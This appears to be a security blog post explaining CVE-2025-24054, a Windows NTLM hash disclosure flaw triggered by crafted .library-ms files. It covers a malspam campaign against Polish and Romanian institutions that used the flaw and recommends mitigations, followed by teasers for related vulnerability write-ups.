CVE-2025-24054: NTLM Exploit in the Wild – A Deep Look at the Latest NTLM Hash Disclosure Vulnerability

CVE-2025-24054: NTLM Exploit in the Wild – A Deep Look at the Latest NTLM Hash Disclosure Vulnerability

By Edi Rimkus



In our fast-evolving threat landscape, even long-trusted authentication protocols are coming under fire. The newly disclosed vulnerability, CVE-2025-24054, has been making headlines as it enables NTLM hash disclosure via spoofing, and its exploitation in the wild is raising alarms across both public and private sectors. Check Point Research has documented active abuse of this flaw, which poses severe risks to Windows environments worldwide.

Understanding NTLM and Its Significance

NTLM (New Technology LAN Manager) is a suite of authentication protocols developed by Microsoft to verify user identities during network logins. NTLM uses the challenge/response mechanism where a user's credentials are not transmitted in plain text but are instead hashed. With the introduction of NTLMv2, Microsoft improved security by incorporating both server and client challenges into the authentication process. However, as attackers have proven time and again, even these improvements are not impervious. When an NTLM hash is intercepted, it can be relayed in pass-the-hash attacks or brute-forced offline, potentially paving the way for privilege escalation and lateral movement within networks.

The Vulnerability: CVE-2025-24054

CVE-2025-24054 is a critical flaw related to NTLM hash disclosure through spoofing techniques. At its core, the vulnerability is triggered by maliciously crafted .library-ms files. Here’s how the exploit works:

  • Trigger Mechanism:
    Although originally believed to require a full execution of the malicious file, later analysis (and Microsoft’s patch documentation) indicated that minimal user interactions—such as right-clicking, drag-and-dropping, or merely navigating to the folder containing the file—are sufficient to activate the exploit.

  • Exploitation Process:
    The crafted .library-ms file forces Windows Explorer to initiate an SMB (Server Message Block) authentication request to a remote server controlled by the attacker. As a result, the system accidentally relays the user’s NTLMv2-SSP hash. Once leaked, these hashes can be brute-forced to recover user passwords or relayed in further attacks to impersonate the user.

  • Similarity to Past Vulnerabilities:
    This vulnerability shares striking characteristics with CVE-2024-43451, indicating that threat actors are reusing and evolving techniques that exploit weaknesses in NTLM even after security improvements.

Active Exploitation in the Wild

Despite Microsoft releasing a patch on March 11, 2025, attackers wasted no time. Active exploitation was first noted on March 19, 2025—just eight days after the patch. A notable campaign, dubbed the "NTLM Exploits Bomb," targeted government and private institutions in Poland and Romania around March 20–21, 2025.

Real-World Campaign Details

  • Distribution Method:
    Victims received malspam emails containing Dropbox-hosted archives. These archives often included multiple files such as:

    • xd.library-ms – the primary file exploiting CVE-2025-24054

    • xd.url, xd.website, and xd.lnk – additional files capable of triggering SMB authentication requests

  • User Interaction Abuse:
    What makes this exploitation particularly dangerous is that it does not rely on complex user actions. Simply accessing the folder containing these malicious files—without even opening or executing them—can trigger the NTLM authentication and leak the hashes.

  • Global Impact:
    Attackers have set up SMB servers in various regions including Russia, Bulgaria, the Netherlands, Australia, and Turkey to collect the leaked authentication data. Downstream, these NTLMv2-SSP hashes are being used for offline brute force, NTLM relay attacks, and potentially full network compromise if the affected credentials belong to privileged users.

Implications and Threat Landscape

NTLM hash disclosure vulnerabilities like CVE-2025-24054 represent a significant shift in attack vectors. With minimal interaction required to trigger the leak, attackers can stealthily capture critical security data from unsuspecting users. The fact that threat actors quickly weaponized this vulnerability post-patch emphasizes two things:

  • The Need for Rapid Response: Organizations must implement patch management policies that not only focus on timely updates but also verify the effectiveness of applied patches.

  • Evolving Attack Tactics: Cybercriminals continue to refine their techniques by combining social engineering (e.g., malspam campaigns with convincing Dropbox links) with technical exploits, ensuring that even robust security measures can be bypassed with minimal effort.

Recommendations for Mitigation

Organizations can take several steps to protect themselves:

  • Apply Patches Immediately: Ensure every Windows system is updated with the latest patches released on March 11, 2025, to reduce vulnerability exposure.

  • User Awareness Training: Educate employees on the risks of interacting with suspicious emails and files—emphasizing that even minimal actions can trigger these exploits.

  • Enhanced Monitoring: Deploy advanced threat detection and monitoring systems, particularly focused on SMB traffic and unusual authentication requests.

  • Network Segmentation and SMB Hardening: Limit exposure by segmenting networks and enforcing strict SMB security policies, such as SMB signing, to mitigate the risk of NTLM relay attacks.

  • Incident Response Preparedness: Develop and test incident response protocols specifically tailored to credential compromise and lateral movement scenarios.

Conclusion

CVE-2025-24054 underscores the persistent challenges facing cybersecurity professionals when defending legacy protocols like NTLM. As attackers continuously adapt, organizations must remain agile—ensuring that they not only deploy patches promptly but also adopt a layered defense strategy. By understanding the mechanics of this exploit and learning from real-world campaigns, we can turn these vulnerabilities into lessons for building a more resilient security posture.

Stay vigilant, keep your systems updated, and continue to refine your defenses in the face of ever-evolving threats.

Feel free to share your thoughts or leave comments below if you have additional insights on mitigating NTLM-based threats. Let’s work together to foster a safer digital environment.

Comments

Post a Comment

Popular posts from this blog

Hadooken: New Linux Malware Exploiting Oracle WebLogic Servers

Image
Hadooken: New Linux Malware Exploiting Oracle WebLogic Servers Introduction In the ever-evolving landscape of cybersecurity threats, a new player has emerged: Hadooken. This Linux malware specifically targets Oracle WebLogic servers, which are widely used for running critical applications in enterprises. Let’s dive into the details. What Is Hadooken? Attack Vector: Hadooken gains unauthorized access to WebLogic servers by exploiting weak passwords. Once inside, it remotely executes malicious code. Attack flow (Source – Aquasec) Payload Components: A shell script named “c” A Python script called “y” Cryptominer and DDoS Botnet Hadooken doesn’t stop at infiltration. It includes: A cryptominer: Hijacking server resources for cryptocurrency mining. The Tsunami malware: A DDoS botnet and backdoor, giving attackers full control. Persistence and Lateral Movement Hadooken ensures persistence by creating cron jobs. It can steal user credentials, allowing lateral movement within networks. But t...
Read more

Critical VMware HCX Vulnerability: What You Need to Know

Image
Critical VMware HCX Vulnerability: What You Need to Know (Image by  Shah Sheikh ) In a recent security advisory, VMware disclosed a critical vulnerability in its Hybrid Cloud Extension (HCX) platform. This vulnerability, identified as CVE-2024-38814, poses a significant threat to organizations using HCX for application mobility and workload migration across data centers and clouds. The Vulnerability The VMware HCX vulnerability is a form of SQL injection that allows authenticated users with non-administrator privileges to execute remote code on the HCX manager. With a CVSS score of 8.8, this high-severity vulnerability can be exploited by inserting malicious SQL queries into the HCX system, potentially granting attackers unauthorized access and control. Affected Versions VMware HCX 4.8.x VMware HCX 4.9.x VMware HCX 4.10.x Mitigation Steps To mitigate this vulnerability, VMware has released patches for the affected versions: HCX 4.8.3 HCX 4.9.2 HCX 4.10.1 Organizations using these v...
Read more

CVE-2024-8190: An OS Command Injection Vulnerability in Ivanti CSA: What You Need to Know

Image
Overview: CVE-2024-8190 is an OS command injection vulnerability found in Ivanti Cloud Services Appliance (CSA) versions 4.6 (before Patch 519) and earlier. The flaw allows a remote authenticated attacker with admin-level privileges to execute arbitrary code on the affected system. Attack Scenario: The attacker must first log into the CSA’s admin login page. While this initial login may seem like a hurdle, it’s not insurmountable in some cases. Dual-homed CSA configurations (where eth0 serves as an internal network) are less vulnerable, as recommended by Ivanti. However, not everyone follows these best practices. Users who accidentally misconfigure interfaces or have weak passwords are at risk. For instance, if an admin swaps the interfaces or configures only one interface, the CSA console could be exposed to the internet. Default login credentials (username: admin, password: admin) should be changed upon initial login. However, weak passwords and the lack of rate limiting for login at...
Read more